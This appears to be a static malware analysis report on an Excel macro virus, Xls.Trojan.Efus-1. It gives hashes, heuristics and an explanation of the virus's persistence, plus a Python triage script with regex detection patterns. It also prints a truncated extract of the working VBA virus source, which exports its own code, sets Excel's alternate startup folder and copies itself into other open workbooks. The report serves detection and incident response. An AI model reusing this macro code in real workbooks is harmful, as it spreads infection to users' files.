Xls.Trojan.Efus-1 — Office (OLE) malware analysis

Static analysis result for SHA-256 69ec9e7c6b55778d…

MALICIOUS

Office (OLE)

Size: 664.5 KB · Created: 2000-09-14 01:43:53 · Authoring application: Microsoft Excel · First seen: 2012-06-14
MD5: d876297317aa4b41d68c1b6a48a69032
SHA-1: 73b2d762f7ed7ee2d298109545125afcf9f4d44a
SHA-256: 69ec9e7c6b55778dd2a430ac549418874040c753622a902a899c9fd8c186cd39
Risk score: 160

Malware Insights

Xls.Trojan.Efus-1 · confidence 95%

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1566.001 Phishing: Spearphishing Attachment

The critical ClamAV signature identifies the file as Xls.Trojan.Efus-1. The high-severity heuristics flag Auto_Open and Auto_Close procedures, which Excel runs without any user interaction when the workbook is opened or closed. The extracted module (VB_Name "SUFE") is a self-replicating macro virus rather than a downloader: it sets Application.AltStartupPath to C:\MS_DOS so that Excel loads whatever sits in that directory at every start, dumps its own source to c:\Ms_IO.sys through the VBE object model (CodeExport), imports that file into a new workbook that is saved as C:\MS_DOS\Command.DOS with its window hidden, and registers Command.DOS!Action as the Application.OnWindow handler. Action, called from both Auto_Open and Auto_Close, walks every open workbook that has been saved to disk and imports the SUFE module into any workbook that does not already contain it (CodeImport_Simple). Action ends with a call to Punish, whose body is not in the extract shown here. Note that on current Office versions the VBProject accesses fail unless "Trust access to the VBA project object model" is enabled; the blanket On Error Resume Next in every routine silently swallows those errors, so the macro is harmless on a default configuration but fully functional on a host where that trust setting is on.
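The behaviour described above can be confirmed mechanically from the decoded VBA source (the artifact that oletools.olevba extracted here). The following triage script is an added example and is not part of the original report or of the oletools project: it looks for the auto-exec entry points, the persistence settings, the VBE object-model calls used for self-replication, and the file paths the macro writes to, then returns a verdict. The embedded SAMPLE is a constructed excerpt assembled from lines of the macro shown on this page, and the indicator tables and the verdict wording are this example's own choices, not a published classification.

```python
import re
import sys

# Procedure names Office runs without user interaction (Excel and Word variants).
AUTO_EXEC_RE = re.compile(
    r"^\s*(?:Public\s+|Private\s+)?Sub\s+"
    r"(Auto_?Open|Auto_?Close|Auto_?Exec|Workbook_Open|Workbook_BeforeClose|"
    r"Document_Open|Document_Close)\s*\(",
    re.IGNORECASE | re.MULTILINE,
)

# Indicator name -> pattern, grouped by what the macro is trying to achieve.
PERSISTENCE = {
    "AltStartupPath": r"\.AltStartupPath\s*=",        # extra startup folder Excel loads every run
    "OnWindow": r"Application\.OnWindow\s*=",         # macro fired on every window activation
    "OnTime": r"Application\.OnTime\b",               # scheduled macro execution
    "MacroOptions": r"Application\.MacroOptions\b",   # binds a shortcut key to a dropped macro
}
SELF_REPLICATION = {
    "VBComponents.Import": r"VBComponents\.Import\b",              # injects a module into a workbook
    "VBE.ActiveVBProject": r"Application\.VBE\.ActiveVBProject\b", # reads its own project
    "CodeModule.Lines": r"\.CodeModule\.Lines\b",                  # reads its own source text
}
# Statements that write to disk; each pattern captures the path literal.
DROP_PATTERNS = [
    re.compile(r"\bMkDir\s*\(?\s*\"([^\"]+)\"", re.IGNORECASE),
    re.compile(r"\bOpen\s+\"([^\"]+)\"\s+For\s+(?:Output|Append|Binary)\b", re.IGNORECASE),
    re.compile(r"\bSaveAs\s+FileName:=\"([^\"]+)\"", re.IGNORECASE),
]


def _hits(source, table):
    """Return the indicator names from `table` whose pattern occurs in `source`."""
    return [name for name, pat in table.items() if re.search(pat, source, re.IGNORECASE)]


def triage_vba(source):
    """Classify decoded VBA source and return the findings plus a verdict string."""
    auto_exec = AUTO_EXEC_RE.findall(source)
    persistence = _hits(source, PERSISTENCE)
    replication = _hits(source, SELF_REPLICATION)
    dropped = []
    for pat in DROP_PATTERNS:
        for path in pat.findall(source):
            if path.lower() not in (p.lower() for p in dropped):
                dropped.append(path)
    if auto_exec and replication:
        verdict = "macro virus: auto-executes and copies its own module into other workbooks"
    elif auto_exec and (persistence or dropped):
        verdict = "suspicious: auto-executes and modifies the host (persistence or file drops)"
    elif auto_exec:
        verdict = "auto-executing macro; review manually"
    else:
        verdict = "no auto-exec entry point found"
    return {
        "auto_exec": auto_exec,
        "persistence": persistence,
        "self_replication": replication,
        "dropped_paths": dropped,
        "verdict": verdict,
    }


# Constructed excerpt, assembled from the macro lines shown on this page.
SAMPLE = r'''
Attribute VB_Name = "SUFE"
Sub Auto_open()
    On Error Resume Next
    Call Option_Set
    Call Settle_C
End Sub
Sub Auto_close()
    On Error Resume Next
    Call Action
End Sub
Sub Option_Set()
    With Application
        .AltStartupPath = "C:\MS_DOS"
    End With
End Sub
Sub Settle_C()
    Application.MacroOptions Macro:="C:\MS_DOS\Command.DOS!Un_do", Description:="", _
        ShortcutKey:="u"
    Application.OnWindow = "C:\MS_DOS\Command.DOS!Action"
    MkDir ("c:\MS_DOS")
    Workbooks.Add
    Application.ActiveWorkbook.VBProject.VBComponents.Import ("c:\Ms_IO.sys")
    ActiveWorkbook.SaveAs FileName:="C:\MS_DOS\Command.DOS", FileFormat:=xlNormal
End Sub
Sub CodeExport()
    Code = Application.VBE.ActiveVBProject.VBComponents(i).CodeModule.Lines(1, 10)
    Open "c:\Ms_IO.sys" For Output Access Write As hFile
End Sub
'''

if __name__ == "__main__":
    # Usage: python triage.py macros.bas   (decoded source, e.g. from `olevba --code sample.xls`)
    text = open(sys.argv[1], encoding="utf-8", errors="replace").read() if len(sys.argv) > 1 else SAMPLE
    for key, value in triage_vba(text).items():
        print(f"{key}: {value}")
```

The dropped_paths list doubles as a host IOC list for response (c:\Ms_IO.sys, C:\MS_DOS\Command.DOS), and the AltStartupPath hit tells the responder that Excel's alternate startup folder setting must be cleared as well as the files removed, otherwise any remaining workbook in C:\MS_DOS is reloaded at the next start.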

Heuristics (4)

  • CLAMAV_DETECTION (critical): ClamAV detected this file as malware: Xls.Trojan.Efus-1
  • OLE_VBA_MACROS (medium, 2 related findings): Document contains VBA macro code
  • OLE_VBA_AUTO (high): Auto_Open macro present
  • OLE_VBA_AUTOCLOSE (high): Auto_Close macro present

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas · Kind: vba-macro · Source: oletools.olevba.extract_macros (decoded VBA source) · Size: 11500 bytes
SHA-256: 8b66f2e06aa19856356415eaa69135f2a6414fdb015358aa297765ac20e533de
Preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "SUFE"
'\
'\Hello!Be sure to make good use of this piece of virus code.Good luck!
'\                                                           -SunUFeiEr
'\
Dim Modu
Dim Infected
Dim Code
Dim puJ
Sub Auto_open()
    On Error Resume Next
    Application.ScreenUpdating = False
    Call Option_Set
    Call Settle_C
    Application.ScreenUpdating = True
    Call Action
End Sub
Sub Auto_close()
    On Error Resume Next
    Call Action
    Call Action_End
End Sub
Sub Option_Set()
On Error Resume Next
    With Application
        .UserName = "SUFE"
        .AltStartupPath = "C:\MS_DOS"
        .EnableSound = False
        .RollZoom = False
    End With
End Sub
Sub Settle_C()
    Dim If_Settled As Boolean
    On Error Resume Next
    With Application.FileSearch
        .LookIn = "C:\MS_DOS"
        .FileName = "Command.dos"
        If .Execute > 0 Then
            If_Settled = True
        End If
    End With
    If If_Settled = True Then
        Application.MacroOptions Macro:="C:\MS_DOS\Command.DOS!Un_do", Description:="", _
            ShortcutKey:="u"
        Application.OnWindow = "C:\MS_DOS\Command.DOS!Action"
        Call CodeExport
        Exit Sub
    Else
        Call CodeExport
        On Error Resume Next
        MkDir ("c:\MS_DOS")
        Workbooks.Add
        Application.ActiveWorkbook.VBProject.VBComponents.Import ("c:\Ms_IO.sys")
        ActiveWorkbook.SaveAs FileName:="C:\MS_DOS\Command.DOS", FileFormat:=xlNormal
        ActiveWorkbook.Save
        ActiveWindow.Visible = False
    End If
    Application.MacroOptions Macro:="C:\MS_DOS\Command.DOS!Un_do", Description:="", _
        ShortcutKey:="u"
    Application.OnWindow = "C:\MS_DOS\Command.DOS!Action"
End Sub
Sub Action()
    On Error Resume Next
    Application.ScreenUpdating = False
    For puJ = 1 To Application.Workbooks.Count
        If (Application.Workbooks(puJ).FullName <> "C:\MS_DOS\Command.DOS" _
            And InStr(Application.Workbooks(puJ).FullName, "\") <> 0) Then
                Call CodeImport_Simple
        End If
    Next puJ
    Application.ScreenUpdating = True
    Call Punish
End Sub
Sub CodeExport()
    Dim i
    Dim hFile As Long
    On Error Resume Next
    i = 0
    For Each Modu In Application.VBE.ActiveVBProject.VBComponents
        i = i + 1
        If (Modu.Name = "SUFE") Then
            Code = Application.VBE.ActiveVBProject.VBComponents(i).CodeModule.Lines(1, Application.VBE.ActiveVBProject.VBComponents(i).CodeModule.CountOfLines)
            Code = "Attribute VB_Name = ""SUFE""" & Chr(13) & Code
        Exit For
        End If
    Next Modu
    hFile = FreeFile
    Open "c:\Ms_IO.sys" For Output Access Write As hFile
        Print #hFile, Code
    Close hFile
End Sub
Sub CodeImport()
    On Error Resume Next
    Infected = False
    For Each Modu In Application.ActiveWorkbook.VBProject.VBComponents
        If (Modu.Name = "SUFE") Then
            Infected = True
            Exit For
        End If
    Next Modu
    If Infected = False Then
        Application.ActiveWorkbook.VBProject.VBComponents.Import ("c:\Ms_IO.sys")
        Application.ActiveWorkbook.Save
    End If
End Sub
Sub CodeImport_Simple()
    On Error Resume Next
    Infected = False
    For Each Modu In Application.Workbooks(puJ).VBProject.VBComponents
        If (Modu.Name = "SUFE") Then
            Infected = True
            Exit For

... (truncated)